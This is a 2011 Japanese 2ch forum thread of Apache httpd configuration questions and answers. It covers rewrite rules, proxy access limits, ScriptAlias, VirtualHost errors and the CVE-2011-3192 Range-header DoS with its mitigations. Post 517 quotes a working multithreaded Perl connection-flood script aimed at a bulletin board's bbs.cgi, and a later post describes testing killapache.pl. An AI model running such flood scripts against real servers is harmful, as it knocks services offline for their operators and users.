2011/06/25(土) 10:49:30.95どっかにあると思ってたけど 492 さんには本当に感謝。
自分も昨日から急遽 source が必要になったから焦ってた。
0495名無しさん@お腹いっぱい。
2011/07/04(月) 18:37:48.03RewriteCond %{DOCUMENT_ROOT}/%{REQUEST_FILENAME} !-d
RewriteCond %{DOCUMENT_ROOT}/%{REQUEST_FILENAME} !-f
RewriteRule ^/item/(.*)\.html /item/detail.php?id=$1 [P,QSA,NE,L]
このような設定がサイトごとに3つあり、10サイト稼働しています
サイトを増やしたところ$1が空でした
ログを見ると条件にマッチしてましたが、$1が空になってしまうのです
他のサイトを一時的に消したところ、なぜか期待通りの動きになりました
apacheのバージョンは2.2.9です
何かお分かりになりますでしょうか
0496名無しさん@お腹いっぱい。
2011/07/04(月) 19:33:55.08しかたなく使うのが許されるウンコであって、
それを通常運用としてしまうのはウンコ以下。
ウンコの限界を極めるウンコ仕事をするよりも、
ウンコを使わないで済むようにスクリプトの方を修正した方がいい。
具体的には、
AliasMatch ^/item/.*\.html /item/detail.php
として、呼ばれたURLから.*の部分を拾うようdetail.phpを書き換える。
0497名無しさん@お腹いっぱい。
2011/07/09(土) 01:11:49.14(事前に指定したサイトしかアクセスできないように設定)
を作ろうとしているのですが、設定が上手くいかないです。
下記、例としてyahooおよびgoogleのみアクセスを許可して、
それ以外のサイトをアクセス拒否させる目的で設定しましたが、
一番上のアクセス拒否の設定が優先されてしまうため、
全てのサイトへのアクセスが拒否されてしまいます。
●現在の設定例(一部抜粋)
<Proxy *>
Order deny,allow
Deny from all
</Proxy>
<Proxy http://www.yahoo.co.jp/*>;
Order allow,deny
Allow from all
</Proxy>
<Proxy http://www.google.co.jp/*>;
Order allow,deny
Allow from all
</Proxy>
上記、あて先がyahooとgoogleのみアクセス許可して、
それ以外のサイトへのアクセスを拒否したいのですが、
Apache2.2でそれを行う方法はあるのでしょうか?
(configの記載順による優先順位の問題でしょうか?)
上記、わかる方がいれば、教えていただけると助かります。
よろしくお願いいたします。
0498名無しさん@お腹いっぱい。
2011/07/23(土) 18:08:53.11参考になるサイトとかって無いかな。もしくは、やったことある人いる?
0499名無しさん@お腹いっぱい。
2011/07/24(日) 00:56:01.270500名無しさん@お腹いっぱい。
2011/07/24(日) 10:34:15.190501名無しさん@お腹いっぱい。
2011/07/24(日) 11:36:01.870502名無しさん@お腹いっぱい。
2011/07/24(日) 12:44:00.71相手からのリクエストを読んでから、遮断するから。
相手が接続だけして、何もデータを送ってこないと接続数がふくれあがるはず。実験してないけど
しかも、遮断する前にスレッドなりプロセスなりを割り当てるから、リソースが無駄。
本来は、acceptした時点でIPアドレスがわかるわけだから、それを振り分ける前に遮断するべき
0503名無しさん@お腹いっぱい。
2011/07/24(日) 13:08:54.970504名無しさん@お腹いっぱい。
2011/07/24(日) 13:29:08.340505名無しさん@お腹いっぱい。
2011/07/24(日) 14:18:19.690506名無しさん@お腹いっぱい。
2011/07/24(日) 18:05:28.860507名無しさん@お腹いっぱい。
2011/07/24(日) 20:34:50.64そんな感じですね。
ぼんやりしたやり取りがたまらないw
0508名無しさん@お腹いっぱい。
2011/07/25(月) 00:12:09.07DoS対策はmod_security
CentOS5.x/Apache2.2.xで安定して使ってるよ
0509名無しさん@お腹いっぱい。
2011/07/25(月) 00:22:08.76なんか帯域カウンターが戻らなくて溜まってしまう感じ
0510名無しさん@お腹いっぱい。
2011/07/25(月) 01:21:57.68バグ報告すれば?それかソースコード自分で見れば?
モジュール単体なら、そんなに量多くないから分かるはず
>>505
http://d.hatena.ne.jp/dayflower/20081029/1225266220
ここを参考mpmのソース見ると、ヘッダーを読み込んだあとにしかモジュールのフックをかけられない構造になってる。
だから、mpm改造しちゃえばできるんだけど。モジュール化の意味合いが薄まるから汚いかなって
0511名無しさん@お腹いっぱい。
2011/07/25(月) 01:24:03.92不完全なのは知ってのことなのか。世界の誰か頑張れよ
俺がもっといいmpm作ろうかな。性能がよければ有名になれるかなwww
0512名無しさん@お腹いっぱい。
2011/07/25(月) 02:28:49.74結局のところモジュール本体に改造を入れることって多いよね。。。
0513名無しさん@お腹いっぱい。
2011/07/25(月) 03:15:04.58だったら作って有名になってみればいいじゃんw
0514509
2011/07/25(月) 10:37:52.60複数プロセスで共有してる奴で、どっかで突然死するプロセスが居ればさもありなんて感じ
発生頻度も週一くらいで、何台かで回してるサービスだし面倒
0515名無しさん@お腹いっぱい。
2011/07/25(月) 11:56:14.210516名無しさん@お腹いっぱい。
2011/08/04(木) 07:37:37.77サーバへにリクエストが来た時、リクエストを受け取るまでhttpdは待っているわけだ
しかしcontentslength分だけ受け取りたいけど待てど暮らせど送ってこないから
httpd.confのtimeoutするまでそのhttpdプロセスがブロックされるんだな
そしてそれがたーくさんたまる、売り切れまで溜まる
売り切れたらそれ以降のhttpの要求は受け付けなくなる
攻撃がやんだらブロックされているhttpdは順次timeoutで開放され
だんだんいつもの状態に近づく
こうなんじゃないかな?
456 ◆IOT1IIO1ILUU-さる♪ sage 2011/08/03(水) 15:06:18.97 ID:219.106.108.87 0
>>449
大体はそんな感じです。
少し違うのは、Content-Lengthは関係ありません。
中途半端なHTTPリクエストであってもApacheが律儀にTCPのタイムアウトまでリソースを確保して待ってしまうのが原因なので、
それこそTCPで何か少しでもデータを送ってやれば、HTTPリクエストとして完全に破綻していてもApacheは落ちます。
なのでHTTPのヘッダに着目して対策するのは無理です。
0517名無しさん@お腹いっぱい。
2011/08/04(木) 07:39:45.57攻撃元のスクリプトは以下
433 名無しさん@お腹いっぱい。 sage 2011/08/03(水) 14:51:01.84 ID:81.94.203.180 0
スクリプト自体はマルチスレッドでBBS.CGIを叩くだけなんだよな
こんな感じで
my $ref = sub{
while(){
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname( 'tcp'));
connect(SOCK, sockaddr_in("80", $ipaddr));
select(SOCK);
$|=1;
select(STDOUT);
print SOCK "POST /test/bbs.cgi HTTP/1.1\r\n";
print SOCK "Accept: */*\r\n";
print SOCK "Referer: http://$sv" . "/news/\r\n";
print SOCK "Accept-Language: ja,en;q=0.5\r\n";
print SOCK "Content-Type: application/x-www-form-urlencoded\r\n";
print SOCK "Accept-Encoding: gzip, deflate\r\n";
print SOCK "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)\r\n";
print SOCK "Host: $sv\r\n";
print SOCK "Content-Length: 1\r\n";
print SOCK "Connection: Keep-Alive\r\n";
print SOCK "\r\n";
close(SOCK);
threads->yield();
}
};
0518名無しさん@お腹いっぱい。
2011/08/04(木) 10:17:16.260519名無しさん@お腹いっぱい。
2011/08/04(木) 10:38:02.85ありがとう
0520名無しさん@お腹いっぱい。
2011/08/07(日) 14:40:43.49Keep-Aliveの時間を指定した場合、どういう時間を指し示すのでしょうか?
Wikipediaを見ていてふと疑問に思いました。
Keepalive time is the duration between two keepalive transmissions in idle condition. TCP keepalive period is required to be configurable and by default is set to no less than 2 hours.
Keepalive interval is the duration between two successive keepalive retransmissions, if acknowledgement to the previous keepalive transmission is not received.
http://en.wikipedia.org/wiki/Keepalive
0521名無しさん@お腹いっぱい。
2011/08/07(日) 15:23:57.310522名無しさん@お腹いっぱい。
2011/08/07(日) 17:14:40.130523名無しさん@お腹いっぱい。
2011/08/09(火) 04:00:06.70telnetでアクセス(HEAD /some/foo/hoge.jpg HTTP/1.0)しても404を返してくるサーバがあります。
それなのに、chromeでアクセスすると画像が表示されます。
これってどういう設定なのでしょうか?
telnetやwgetでchromeと同じ結果を得るためには、どうアクセスするべきなのでしょうか?
0524509
2011/08/09(火) 10:40:40.070525名無しさん@お腹いっぱい。
2011/08/10(水) 03:24:02.30Chrome で見えるって言うのは、画像の URI を直接指定して?
こちらの紳士達が詳しいかも↓
http://hibari.2ch.net/test/read.cgi/unix/1305422004/l50
0526名無しさん@お腹いっぱい。
2011/08/10(水) 22:09:42.74ユーザエージェント制限の可能性があるけどその場合は404じゃんくて403だよね
0527名無しさん@お腹いっぱい。
2011/08/10(水) 23:46:51.840528名無しさん@お腹いっぱい。
2011/08/11(木) 00:04:53.560529名無しさん@お腹いっぱい。
2011/08/11(木) 10:41:31.120530名無しさん@お腹いっぱい。
2011/08/11(木) 12:15:38.68軽い気持ちで404返してるかも知れないのにお前は何を言ってるんだ?
0531名無しさん@お腹いっぱい。
2011/08/11(木) 13:36:22.240532名無しさん@お腹いっぱい。
2011/08/13(土) 04:50:07.440533名無しさん@お腹いっぱい。
2011/08/18(木) 10:42:17.44どう設定したらいいかな。
chinkoサーバに http://unko/ というアクセスがあったとき
200でなく404とか適切なエラーを返したい
0534名無しさん@お腹いっぱい。
2011/08/18(木) 10:43:51.160535名無しさん@お腹いっぱい。
2011/08/18(木) 18:25:43.830536名無しさん@お腹いっぱい。
2011/08/25(木) 21:34:02.90Range header DoS vulnerability Apache HTTPD 1.3/2.x
1) Use SetEnvIf or mod_rewrite to detect a large number of ranges and then
either ignore the Range: header or reject the request.
Option 1: (Apache 2.0 and 2.2)
# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range
# optional logging.
CustomLog logs/range-CVE-2011-3192.log common env=bad-range
対策してね。
0537名無しさん@お腹いっぱい。
2011/08/25(木) 22:01:49.96http://hatsukari.2ch.net/test/read.cgi/news/1314272986/
0538名無しさん@お腹いっぱい。
2011/08/25(木) 23:31:09.77https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2011-3192
0539名無しさん@お腹いっぱい。
2011/08/26(金) 10:04:21.250540名無しさん@お腹いっぱい。
2011/08/26(金) 11:57:53.46問題は2chが落ちた原因が ApacheKillerだと認識されてるかどうかだが。
2ch来てない奴には通用しないかも。ニュース系サイトでの取扱い鈍いし。
0541名無しさん@お腹いっぱい。
2011/08/26(金) 21:29:06.82それ対策なってねーぞw
0542名無しさん@お腹いっぱい。
2011/08/26(金) 22:36:22.12==============================
UPDATE 2
なんてのを用意中ぽいな
workaroundも修正されとるでぇ
ttp://mail-archives.apache.org/mod_mbox/httpd-dev/201108.mbox/%3CF0328A02-507F-42F6-A99E-EC2F30733BB7@bbc.co.uk%3E
0543名無しさん@お腹いっぱい。
2011/08/26(金) 23:00:52.14http://mail-archives.apache.org/mod_mbox/httpd-announce/201108.mbox/%3C20110826103531.998348F82@minotaur.apache.org%3E
ということで
>>536
はネタが古い
0544名無しさん@お腹いっぱい。
2011/08/26(金) 23:50:02.78お前らちゃんと検証しろよな
0545名無しさん@お腹いっぱい。
2011/08/27(土) 09:17:11.02あんまし困らないけどenv=bad-req-rangeの定義がないような気がする・・・。
SetEnvIf漏れ?
0546名無しさん@お腹いっぱい。
2011/08/27(土) 09:59:14.610547名無しさん@お腹いっぱい。
2011/08/29(月) 18:31:37.90「使ってないぞコレ」と思ったらコメントアウトしてOK?
なんか気を付けることがあったらおしえてください。
0548名無しさん@お腹いっぱい。
2011/08/29(月) 18:50:36.980549名無しさん@お腹いっぱい。
2011/08/29(月) 19:00:03.08一応Apacheのところを読んではいるんですが、
「××する機能」とはあるんですが、止めたら何が問題か?は書いてないですよね?
ノウハウっぽいところがあるのかな?と。
0550名無しさん@お腹いっぱい。
2011/08/29(月) 19:29:15.160551名無しさん@お腹いっぱい。
2011/08/29(月) 19:43:26.290552名無しさん@お腹いっぱい。
2011/08/29(月) 19:46:34.21そのモジュールが提供するディレクティブ一覧が載ってる。
そのディレクティブを使ってなければたいていいらない。
0553名無しさん@お腹いっぱい。
2011/08/29(月) 21:15:45.17大体そんな方針で良いみたいですね
ある程度最初からonにしてあるのは利便性のタメかな?
0554名無しさん@お腹いっぱい。
2011/08/29(月) 23:02:41.020555名無しさん@お腹いっぱい。
2011/08/30(火) 11:10:26.12apacheのドキュメントルート直下に/cgi-bin/という名前のフォルダを作ると、
Forbiddenとなってしまい、それ以下のファイルを参照することが出来なくなってしまいます。
直下に/cgi-bin/を配置するのではなく、/test/cgi-bin/というようにワンクッション置けば参照できるようになります。
これは正常な動作なのでしょうか?
また、これが正常な動作である場合、ドキュメントルート直下に/cgi-bin/というフォルダを置いても
Forbiddenにならないようにするにはどのように設定を変更すればよいのでしょうか?
教えていただきたいです。
0556名無しさん@お腹いっぱい。
2011/08/30(火) 11:20:54.28っ ScriptAlias
0557555
2011/08/30(火) 12:28:42.47ありがとうございます。
つまり、ドキュメントルート直下に/cgi-bin/を作成すると、ScriptAliasの設定と競合する形になってしまうってことですかね?
それでScriptAliasの設定が優先されるので、自分で作成した/cgi-bin/はForbiddenになってしまうと。
あと、単純な質問になってしまいますが、そもそもScriptAliasの設定したディレクトリにcgiを置くメリットってなんなんでしょうか?
cgi自体をダウンロードされたり表示されないようにするためだと記してあるサイトが多いようですが、
ScriptAliasに置かなくてもcgiにアクセスしたら、結局はプログラムが実行された後の結果しか与えられないと考えていたのですが。
ScriptAliasで設定したディレクトリ以外に置かれたcgiというのは、その中身が簡単にみられてしまったりするのでしょうか?
0558名無しさん@お腹いっぱい。
2011/08/30(火) 13:28:23.86> つまり、ドキュメントルート直下に/cgi-bin/を作成すると、ScriptAliasの設定と競合する形になってしまうってことですかね?
ScriptAlias の指定が優先されてドキュメントルートの方の /cgi-bin/ は参照されない。
> あと、単純な質問になってしまいますが、そもそもScriptAliasの設定したディレクトリにcgiを置くメリットってなんなんでしょうか?
一ヶ所に集めておくと管理しやすい。
あやしいプログラムをユーザに勝手に置かれるのを防ぐ。
0559555
2011/08/30(火) 14:09:15.85解説ありがとうございます。
>あやしいプログラムをユーザに勝手に置かれるのを防ぐ。
これはつまりセキュリティの事を考慮すると、cgiはScriptAliasで設定したディレクトリに置いた方がよいということですよね。
この質問とは別のことになりますが、例えばページの管理者だけが使用することを目的としたcgiを作成した場合、
ドキュメントルート下にhtaccessの設定でBasic認証を有効にしたディレクトリにそのcgiを置くよりも、
ScriptAliasで設定したディレクトリにそのcgiを置いた方がセキュリティ面では良いということになるのでしょうか?
0560名無しさん@お腹いっぱい。
2011/08/30(火) 14:21:51.67管理しきれるならどこに置いてもいいんじゃね。
あと、自分と同じディレクトリにデータファイルを作るようなプログラムがあった場合に
ScriptAlias 以下ならそのファイルを覗かれることがない、っていう利点もあるにはある。
副次的な効果だけど。
そんなプログラム作る方が悪いんだけど。
0561555
2011/08/30(火) 14:34:43.13とりあえず、初心者なのでScriptAliasで設定したディレクトリにcgiを集めることにしてみます。
お答えくださってありがとうございました。
0562名無しさん@お腹いっぱい。
2011/08/30(火) 14:46:50.140563名無しさん@お腹いっぱい。
2011/08/31(水) 10:38:02.430564名無しさん@お腹いっぱい。
2011/08/31(水) 11:02:44.56テストは面倒だからしてない(・∀・)y‐┛~~
0565名無しさん@お腹いっぱい。
2011/08/31(水) 14:52:22.61まだまだ沢山いると思うんだけど...
0566名無しさん@お腹いっぱい。
2011/08/31(水) 15:02:26.970567名無しさん@お腹いっぱい。
2011/08/31(水) 15:06:53.44仕事先のだとなかなか...
0568名無しさん@お腹いっぱい。
2011/08/31(水) 15:07:58.370569名無しさん@お腹いっぱい。
2011/08/31(水) 17:54:52.560570名無しさん@お腹いっぱい。
2011/08/31(水) 23:31:26.50>>538
0571名無しさん@お腹いっぱい。
2011/09/01(木) 03:47:35.520572名無しさん@お腹いっぱい。
2011/09/01(木) 10:45:44.80来たよ。
http://rhn.redhat.com/errata/RHSA-2011-1245.html
0573名無しさん@お腹いっぱい。
2011/09/01(木) 11:18:40.390574名無しさん@お腹いっぱい。
2011/09/01(木) 11:40:51.420575名無しさん@お腹いっぱい。
2011/09/01(木) 12:11:51.87RHEL4.xのパッチをパクればOK
0576名無しさん@お腹いっぱい。
2011/09/01(木) 12:29:35.321.3.x は出さないと言ってた気がする
0577名無しさん@お腹いっぱい。
2011/09/01(木) 12:39:32.05今回の脆弱性で実際に攻撃を受けたってサイトはあるの?
0578名無しさん@お腹いっぱい。
2011/09/01(木) 13:12:44.862ch とか?
0579名無しさん@お腹いっぱい。
2011/09/01(木) 13:15:49.58非公式な対応はいろいろあるけど、
公式に出ないのかな、と思って。
0580名無しさん@お腹いっぱい。
2011/09/01(木) 14:41:38.010581名無しさん@お腹いっぱい。
2011/09/01(木) 14:43:16.08とつぜんどうしたの。
0582名無しさん@お腹いっぱい。
2011/09/01(木) 14:48:35.430583名無しさん@お腹いっぱい。
2011/09/01(木) 18:50:37.25落としてみて報告してくれと無茶ぶりされて、
必死こいて頑張っていますが、
killapache.pl を使って、
1.3.xでは落ちません。
2.2.xでは落ちました。
変な話ですが、1.3.xで落とせた方はいらっしゃいますか?
0584名無しさん@お腹いっぱい。
2011/09/01(木) 20:19:33.780585名無しさん@お腹いっぱい。
2011/09/01(木) 20:26:28.530586名無しさん@お腹いっぱい。
2011/09/01(木) 20:35:48.51なんでinetdモード使ってるの?
0587名無しさん@お腹いっぱい。
2011/09/01(木) 20:38:22.720588名無しさん@お腹いっぱい。
2011/09/01(木) 21:50:55.78TCP Wrapper が使いたいとか?
0589名無しさん@お腹いっぱい。
2011/09/01(木) 22:15:07.02ここが参考になるかも
http://blog.tokumaru.org/2011/08/apache-killerapache-killer.html
0590名無しさん@お腹いっぱい。
2011/09/01(木) 22:40:19.55MaxClientsを下げて10にしましたが、ビクともしません。
そもそもkillapache.plの
28行目 for ($k=0;$k<1300;$k++) {
を
for ($k=5;$k<1300;$k++) {
としないと
206 Partial Content
が返りませんでした。200が返りました。
2.2.xでは、何もしなくても206が返りました。
再現方法が違うのでしょうか?
0591名無しさん@お腹いっぱい。
2011/09/01(木) 22:45:57.52http://people.apache.org/~dirkx/CVE-2011-3192.txt
0592名無しさん@お腹いっぱい。
2011/09/01(木) 23:09:15.40583です。
そんな今さら・・・
Apache 1.3 is NOT vulnerable.
えっ!?
UPDATE2までしか見ていませんでした。
ありがとうございました!
0593名無しさん@お腹いっぱい。
2011/09/01(木) 23:40:13.170594名無しさん@お腹いっぱい。
2011/09/02(金) 01:22:26.29ttp://www.jpcert.or.jp/at/2011/at110023.html
0595名無しさん@お腹いっぱい。
2011/09/02(金) 08:36:48.740596名無しさん@お腹いっぱい。
2011/09/03(土) 12:23:58.91http://huge.shit.com/test.php?param=xxx -> 404 Not Found
http://<;上記ドメインのIP>/test.php -> 200 OK
http://<;上記ドメインのIP>/test.php?param=xxx -> 200 OK
Virtualhostへのアクセスで存在するファイルにGETパラメータを渡すと404になる。
こんな現象に悩まされてるんだけど、これなんで?誰か教えて!
0597名無しさん@お腹いっぱい。
2011/09/03(土) 12:39:44.970598名無しさん@お腹いっぱい。
2011/09/03(土) 12:45:11.61ていうか、パラメータ渡すと not found になる設定ってあるのかな。
昨日まで正常だったのに、いきなりこの現象が発生してわけわからんのです。
0599名無しさん@お腹いっぱい。
2011/09/03(土) 13:44:17.550600名無しさん@お腹いっぱい。
2011/09/03(土) 13:48:55.99おれ以外にも管理者はいるから誰かが
何かを書き換えた可能性はなくはないんだよね。
?でパラメータ渡すと別ファイルとして認識されちゃうってことだよね多分これ。
0601名無しさん@お腹いっぱい。
2011/09/03(土) 14:14:14.82confの日付で実際更新されてるか分かるだろうし。
0602名無しさん@お腹いっぱい。
2011/09/03(土) 14:21:53.08Rewrite使ってる?
Apache Killerの件で設定変えたとか。
0603名無しさん@お腹いっぱい。
2011/09/03(土) 15:36:13.73Rewriteは、してないね。
killapache対策はしたけど、数日前なので、タイミングは合致しないなー。
0604名無しさん@お腹いっぱい。
2011/09/03(土) 15:45:48.190605名無しさん@お腹いっぱい。
2011/09/03(土) 16:34:37.48diffすればいいんじゃない?
0606名無しさん@お腹いっぱい。
2011/09/03(土) 16:57:16.34誰が何を変更したのかがわかる状況ではないんだよね。confの更新日はkillapache対策の時だね。昨日じゃない。
ためしにRange周りの設定をオフってみたけど関係ないみたい。
>> 604
FirefoxのHackbarってアドオン使ってPOSTしてみた限りでは問題なかべおん。
てかさ、
/js/jquery.js
だとアクセスできて
/js/jqueyr.js?test
でNot Foundになるってどおゆうことなんだろう。んなことある?
0607名無しさん@お腹いっぱい。
2011/09/03(土) 18:53:08.15違うブラウザではどんな?同じ動作?
0608名無しさん@お腹いっぱい。
2011/09/03(土) 19:19:20.79うだうだ書いてるヒマあったら他の管理者どもに話を訊けよアホ
あと設定ファイルの変更履歴とれやボケ
0609名無しさん@お腹いっぱい。
2011/09/03(土) 19:35:31.640610名無しさん@お腹いっぱい。
2011/09/03(土) 19:37:16.200611名無しさん@お腹いっぱい。
2011/09/03(土) 22:37:24.77どのブラウザでも一緒だね。
IP直打ちとVirtualHostで動作が違うってのがポイントだと思ってずっと調べてるけど、未だ解決できず。
>>608
confに変更はない。他の管理者は連絡とれず。やーここの人なら「そりゃおめー原因はあれだよ」ってなるかなと
思ってさ。自力で調べつつ、わらにもすがる思いで聞いとります。
0612名無しさん@お腹いっぱい。
2011/09/03(土) 23:28:57.17config晒せば。
何らかの意図があって設定を変更しているのなら
設定を戻せば良いって話でもない気がするけど。
0613名無しさん@お腹いっぱい。
2011/09/03(土) 23:43:40.87>IP直打ちとVirtualHostで動作が違うってのがポイントだと思ってずっと調べてるけど、未だ解決できず。
そこじゃないかもしれんぞな。
/js/jqueyr.js?test
↑↑↑↑
尻尾つきで、POSTするとどない?エラー?
0614名無しさん@お腹いっぱい。
2011/09/04(日) 00:07:46.90こんな結果です。
[尻尾あり]
http://xxx.example.com/js/jquery.js?test
POST /js/jquery.js?test HTTP/1.1
HTTP/1.1 404 Not Found
[尻尾なし]
http://xxx.example.com/js/jquery.js
POST /js/jquery.js HTTP/1.1
HTTP/1.1 200 OK
0615名無しさん@お腹いっぱい。
2011/09/04(日) 00:42:20.85POSTとGET関係ないと。
VirtualHostとの時だけ変なら、
試しに、違うドメインを追加(VirtualHost)して、そっちでも変になりますか?
差し障り範囲(ドメインとか、IPとかXXXして)で、confを見せていただけると、何か分かるかもね。
apacheバージョンとか、組み込んでるモジュールとか
0616名無しさん@お腹いっぱい。
2011/09/06(火) 07:41:07.60巨大なファイルを扱っていない限りrangeヘッダに非対応でもいいので
RequestHeader unset Range
RequestHeader unset Request-Range
二行追加でよろしいでしょうか?
0617名無しさん@お腹いっぱい。
2011/09/06(火) 08:16:43.48<IfVersion < 2.2.20>
RequestHeader unset Range
RequestHeader unset Request-Range
</IfVersion>
0618名無しさん@お腹いっぱい。
2011/09/06(火) 14:25:04.79Apacheにおける環境変数QUERY_STRINGの呼び出しに関する質問です。
Apache上に置いてあるshtml内にGETメソッドのフォームを設置しています。
フォームのテキストボックス内に日本語で文字を入力してsubmitボタンを押し、
新しく表示されたshtml内でSSIを使用して、cgiで環境変数QUERY_STRINGをshtml内に表示しようとしています。
テキストボックスに何も入力しない場合や半角英数字のみを入力した場合は正しく習得され、
cgiによってshtml内に環境変数QUERY_STRINGのデータがしっかりと表示されるのですが、
テキストボックス内に日本語を入力した場合は、shtml内に環境変数QUERY_STRINGの中身が
何もない状態であるかのように表示されてしまいます。つまり、『?』以降が何も表示されないということです。
しかし、テキストボックス内に日本語を入力した場合でも、新しく表示されたshtmlのURLには入力した文字データが
GETメソッドとして正常に受け取られているように表示されています。
AN HTTPDで全く同じshtmlおよびcgiを使用した場合は、日本語を入力してもshtml内にその結果が正しく表示されるので、
Apache内の何かが原因であるのではないかなと考えているのですが、よく分かりません。
お分かりになる方おられましたら、どうかよろしくお願いします。
0619名無しさん@お腹いっぱい。
2011/09/06(火) 15:35:20.590620名無しさん@お腹いっぱい。
2011/09/06(火) 18:18:46.32shtmlがUTF-8じゃないんだろw
0621名無しさん@お腹いっぱい。
2011/09/06(火) 21:31:32.29LogLevel debug を設定したらヒントが出るかもしれない。
0622名無しさん@お腹いっぱい。
2011/09/06(火) 21:36:14.32あと、>>596 を見て思うのは、
huge.shit.com/test.php?param=xxx のときは
"test.php?param=xxx" というファイルを探しに行ってるんじゃないかと・・・
まぁ、バーチャルホスト内の設定のどこかがおかしいんだろう。
あとは .htaccess が置いてあったりとか。
0623618
2011/09/07(水) 01:01:45.37おっしゃるとおり、shtmlはUTF-8ではなくShift_JISで作成したものです。
UTF-8のページにしたところ、日本語のデータを表示することができました。
ありがとうございました。
GETを受けるページがUTF-8でなければならないのは、Apacheの仕様なのですか?
Shift_JISでも表示できるように、設定で変更することなどは可能ですか?
AN HTTPDではshtmlがShift-JISで書かれていてもちゃんと表示されていたので、
Apacheだとなぜ表示されないのかよく分からないのですが・・・。
0624名無しさん@お腹いっぱい。
2011/09/07(水) 11:43:32.18?が全角
0625名無しさん@お腹いっぱい。
2011/09/07(水) 12:34:26.140626名無しさん@お腹いっぱい。
2011/09/12(月) 16:53:37.17その後どうよ。
0627名無しさん@お腹いっぱい。
2011/09/13(火) 14:52:27.400628名無しさん@お腹いっぱい。
2011/09/13(火) 16:36:44.83*) Fix a regression introduced by the CVE-2011-3192 byterange fix in 2.2.20.
PR 51748. [<lowprio20 gmail.com>]
*) core: Allow MaxRanges none|unlimited|default and set 'Accept-Ranges: none'
in the case Ranges are being ignored with MaxRanges none.
[Eric Covener]
0629名無しさん@お腹いっぱい。
2011/09/20(火) 12:59:10.14お名前.comでドメイン取得
さくらvpsを契約し
var/www/html/rails_app/public
をドキュメントとして
http://example.com にアクセスしたとき
Railsのアプリが走るようにしています
そして
usr/share/phpMyAdmin
にphpmyadminを入れています
http://phpmyadmin.example.com
にアクセスしたときだけ
phpmyadminが表示されるようにするには
どのような設定をすればいいでしょうか?
0630名無しさん@お腹いっぱい。
2011/09/20(火) 13:16:50.42の人?
0631名無しさん@お腹いっぱい。
2011/09/23(金) 16:36:44.12ソース同梱のspecファイル中に
# symlinks for /etc/httpd
とあって、logやrunやmodulesのシンボリックリンクを作ってるんですが
/etc/httpd配下にそんなシンボリックリンクいらなくないですか?
どういう意味があるんでしょうか
0632名無しさん@お腹いっぱい。
2011/09/23(金) 18:05:23.72いらないと思うなら作る必要はない。
歴史的に /etc 配下に設定ファイルを集めているだけ
/etc の配下に httpd があれば、設定ファイルを探しやすいってだけだ
/usr/local/httpd とかに全部入れる人だっているんだし
自分だけが触るなら別に何でも良いじゃないの?
他人が触るなら /etc/httpd があった方が、親切
0633名無しさん@お腹いっぱい。
2011/09/26(月) 10:23:38.12symlink がないとモジュールの場所はじめありとあらゆるものが
相対パスで書けなくなるんだよ。
0634名無しさん@お腹いっぱい。
2011/09/26(月) 17:31:11.27$ ps -ef|egrep 'http|apache'
$ /usr/sbin/apache2 -V
って感じでたどっていくね><
0635名無しさん@お腹いっぱい。
2011/09/26(月) 17:41:29.860636名無しさん@お腹いっぱい。
2011/09/29(木) 21:04:06.24「localhost:8080」からのみアクセス許可したいのですができません。
Order allow,deny
Allow from localhost:8080
とやるとエラーが出てApacheが起動しなくなります。
どなたかご教授を・・。
0637名無しさん@お腹いっぱい。
2011/09/29(木) 21:14:13.210638名無しさん@お腹いっぱい。
2011/09/29(木) 21:15:50.250639名無しさん@お腹いっぱい。
2011/09/29(木) 21:45:40.320640636
2011/09/29(木) 21:56:31.63ポートを指定した場合のケースはググっても見つからないのよ。。
0641名無しさん@お腹いっぱい。
2011/09/29(木) 22:39:15.28そのポートで Listen してるんよね。
そしたら、localhost だけAllow にして...
後は、分かるよな。
0642名無しさん@お腹いっぱい。
2011/09/29(木) 22:46:21.35それだと403エラーとなってしまいます。
Forbidden
You don't have permission to access / on this server.
<Directory "C:/xampp/Apache/htdocs">
Allow from All
</Directory>
にしたり、Listenを80にすれば普通にアクセスできるのですが。
0643名無しさん@お腹いっぱい。
2011/09/29(木) 23:05:06.03充実したドキュメントがあっても理解できないお馬鹿さんでもあるという
そんなかんじ?
0644名無しさん@お腹いっぱい。
2011/09/29(木) 23:29:33.450645636
2011/09/29(木) 23:32:43.56>Listenを80にすれば普通にアクセスできる
これは間違いでした。以下の設定で「http://localhost/」にアクセスしても
403エラーとなります。
Listen 80
ServerName localhost:80
<Directory />
Options FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
</Directory>
<Directory "C:/xampp/Apache/htdocs">
Options Indexes FollowSymLinks
AllowOverride None
Order allow,deny
Allow from localhost
</Directory>
Allow from localhostの部分をAllow from Allとすると「It works!」と出て接続できます。
ポート関係なしにlocalhostからのみアクセス許可することもできません。
0646名無しさん@お腹いっぱい。
2011/09/29(木) 23:42:45.12ちょっと、落ち着け。
403になるなら、
DocumentRoot はどこかね。
0647名無しさん@お腹いっぱい。
2011/09/29(木) 23:55:10.08済みません、やはり最初ので正しいです。
>>645キャッシュが原因で403エラーとなっていたようで、クイック起動バーから
新しいウィンドウを開くと「It works!」と出て接続できます。
Allow from localhostで「http://localhost/」はOKということです。
ポートを8080にして「http://localhost:8080/」でアクセスすると403エラーとなります。
全ブラウザを閉じてからアクセスして確認しました。
Listen 8080
ServerName localhost:8080
<Directory />
Options FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
</Directory>
<Directory "C:/xampp/Apache/htdocs">
Options Indexes FollowSymLinks
AllowOverride None
Order allow,deny
Allow from localhost
</Directory>
DocumentRoot "C:/xampp/Apache/htdocs"
0648名無しさん@お腹いっぱい。
2011/09/30(金) 00:10:00.398080 でアクセスするとき、error_log に何て出てる?
0649名無しさん@お腹いっぱい。
2011/09/30(金) 00:31:32.37たくさんあってどれを挙げればいいかわからないんですがこんな感じのがありました。
[Fri Sep 30 00:12:17 2011] [notice] Child 7976: Starting thread to listen on port 8080.
[Fri Sep 30 00:12:38 2011] [error] [client 127.0.0.1] client denied by server configuration: C:/xampp/Apache/htdocs/
[Fri Sep 30 00:13:50 2011] [notice] Parent: Received restart signal -- Restarting the server.
[Fri Sep 30 00:13:50 2011] [notice] Child 7976: Exit event signaled. Child process is ending.
httpd.exe: Could not reliably determine the server's fully qualified domain name, using 192.168.1.2 for ServerName
それとWindowsファイアウォールを今調べているところです。
0650名無しさん@お腹いっぱい。
